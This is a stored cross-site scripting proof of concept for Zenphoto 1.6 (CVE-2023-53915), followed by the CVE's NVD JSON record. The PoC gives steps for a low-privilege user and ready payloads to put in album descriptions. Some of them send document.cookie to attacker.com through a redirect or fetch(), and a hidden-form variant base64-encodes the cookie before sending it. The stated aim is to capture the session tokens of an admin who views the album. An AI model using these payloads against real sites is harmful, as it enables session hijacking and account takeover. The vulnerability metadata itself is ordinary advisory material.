CVE-2023-53915

// CVE-2023-53915 Stored XSS PoC for Zenphoto 1.6 // Steps to exploit: // 1. Login to Zenphoto with low-privilege account // 2. Navigate to Albums -> Create Album // 3. In the album description field, inject the following payload: // Payload 1: Cookie Stealer const xssPayload1 = `<script>document.location='https://attacker.com/steal?c='+document.cookie</script>`; // Payload 2: Iframe Injection const xssPayload2 = `<iframe src="javascript:alert(document.cookie)">`; // Payload 3: Event Handler const xssPayload3 = `<img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)">`; // HTML Form Submission Example: // <form action="https://target.com/zenphoto/zp-core/zp-extensions/album_xipe/theme-album-theme.php" method="POST"> // <input type="hidden" name="album_name" value="Malicious Album"> // <input type="hidden" name="album_desc" value="<script>fetch('https://attacker.com/steal?c='+btoa(document.cookie))</script>"> // <input type="submit" value="Create Album"> // </form> // When admin views the album, the XSS payload executes automatically // Attacker receives victim's cookies/session tokens

{"cve": {"id": "CVE-2023-53915", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:50.137", "lastModified": "2025-12-27T17:15:43.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zenphoto 1.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by inserting HTML content into album descriptions. Attackers can create albums with malicious iframe or script tags in the description field that execute when users view the album page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zenphoto:zenphoto:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "4B083CFE-9C59-4DFC-880D-FAD00A921134"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51485", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/zenphoto-stored-cross-site-scripting-via-album-description", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zenphoto.org/news/zenphoto-1.6/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.exploit-db.com/exploits/51485", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}